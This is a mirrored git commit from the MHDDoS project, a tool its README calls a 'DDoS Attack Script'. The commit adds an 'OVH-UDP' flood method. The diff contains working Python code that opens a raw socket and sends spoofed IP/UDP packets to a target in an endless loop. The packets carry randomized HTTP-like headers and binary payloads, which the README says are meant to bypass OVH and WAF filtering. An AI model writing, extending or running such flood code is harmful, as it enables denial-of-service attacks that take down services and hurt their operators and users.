mirror of https://github.com/MatrixTM/MHDDoS.git
Added OVH-UDP
This commit is contained in:
parent
e9d0e8da68
commit
608b38de68
|
|
@ -1,4 +1,4 @@
|
|||
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
|
||||
<h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
|
||||
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
|
||||
|
||||
<p align="center">
|
||||
|
|
@ -49,6 +49,7 @@
|
|||
* <img src="https://raw.githubusercontent.com/kgretzky/pwndrop/master/media/pwndrop-logo-512.png" width="16" height="16" alt="tcp"> TCP | TCP Flood Bypass
|
||||
* <img src="https://styles.redditmedia.com/t5_2rxmiq/styles/profileIcon_snoob94cdb09-c26c-4c24-bd0c-66238623cc22-headshot.png" width="16" height="16" alt="udp"> UDP | UDP Flood Bypass
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/1918/1918576.png" width="16" height="16" alt="syn"> SYN | SYN Flood
|
||||
* <img src="https://static-00.iconduck.com/assets.00/ovh-icon-2048x2048-l4c3izvg.png" width="16" height="16" alt="ovh"> OVH-UDP | UDP flood with randomized HTTP-like headers and binary payloads to bypass OVH and WAF filters.
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/1017/1017466.png" width="16" height="16" alt="cps"> CPS | Open and close connections with proxy
|
||||
* <img src="https://icon-library.com/images/icon-ping/icon-ping-28.jpg" width="16" height="16" alt="icmp"> ICMP | Icmp echo request flood (Layer3)
|
||||
* <img src="https://s6.uupload.ir/files/1059643_g8hp.png" width="16" height="16" alt="connection"> CONNECTION | Open connection alive with proxy
|
||||
|
|
|
|||
47
start.py
47
start.py
|
|
@ -128,7 +128,7 @@ class Methods:
|
|||
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
|
||||
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
|
||||
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
|
||||
"TS3", "MCPE", "ICMP", "DISCORD",
|
||||
"TS3", "MCPE", "ICMP", "DISCORD", "OVH-UDP",
|
||||
}
|
||||
|
||||
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
|
||||
|
|
@ -401,6 +401,7 @@ class Layer4(Thread):
|
|||
"MCPE": self.MCPE,
|
||||
"FIVEM": self.FIVEM,
|
||||
"FIVEM-TOKEN": self.FIVEMTOKEN,
|
||||
"OVH-UDP": self.OVHUDP,
|
||||
"DISCORD": self.DISCORD,
|
||||
"MINECRAFT": self.MINECRAFT,
|
||||
"CPS": self.CPS,
|
||||
|
|
@ -472,6 +473,14 @@ class Layer4(Thread):
|
|||
continue
|
||||
Tools.safe_close(s)
|
||||
|
||||
def OVHUDP(self) -> None:
|
||||
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
|
||||
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
|
||||
while True:
|
||||
for payload in self._generate_ovhudp():
|
||||
Tools.sendto(s, payload, self._target)
|
||||
Tools.safe_close(s)
|
||||
|
||||
def ICMP(self) -> None:
|
||||
payload = self._genrate_icmp()
|
||||
s = None
|
||||
|
|
@ -582,6 +591,42 @@ class Layer4(Thread):
|
|||
continue
|
||||
Tools.safe_close(s)
|
||||
|
||||
def _generate_ovhudp(self) -> List[bytes]:
|
||||
packets = []
|
||||
|
||||
methods = ["PGET", "POST", "HEAD", "OPTIONS", "PURGE"]
|
||||
paths = ['/0/0/0/0/0/0', '/0/0/0/0/0/0/', '\\0\\0\\0\\0\\0\\0', '\\0\\0\\0\\0\\0\\0\\', '/', '/null', '/%00%00%00%00']
|
||||
|
||||
for _ in range(randint(2, 4)):
|
||||
ip = IP()
|
||||
ip.set_ip_src(__ip__)
|
||||
ip.set_ip_dst(self._target[0])
|
||||
|
||||
udp = UDP()
|
||||
udp.set_uh_sport(randint(1024, 65535))
|
||||
udp.set_uh_dport(self._target[1])
|
||||
|
||||
payload_size = randint(1024, 2048)
|
||||
random_part = randbytes(payload_size).decode("latin1", "ignore")
|
||||
|
||||
method = randchoice(methods)
|
||||
path = randchoice(paths)
|
||||
|
||||
payload_str = (
|
||||
f"{method} {path}{random_part} HTTP/1.1\n"
|
||||
f"Host: {self._target[0]}:{self._target[1]}\r\n\r\n"
|
||||
)
|
||||
|
||||
payload = payload_str.encode("latin1", "ignore")
|
||||
|
||||
udp.contains(Data(payload))
|
||||
ip.contains(udp)
|
||||
|
||||
packets.append(ip.get_packet())
|
||||
|
||||
return packets
|
||||
|
||||
|
||||
def _generate_discord(self) -> bytes:
|
||||
ip: IP = IP()
|
||||
ip.set_ip_src(__ip__)
|
||||
|
|
|
|||
Loading…
Reference in New Issue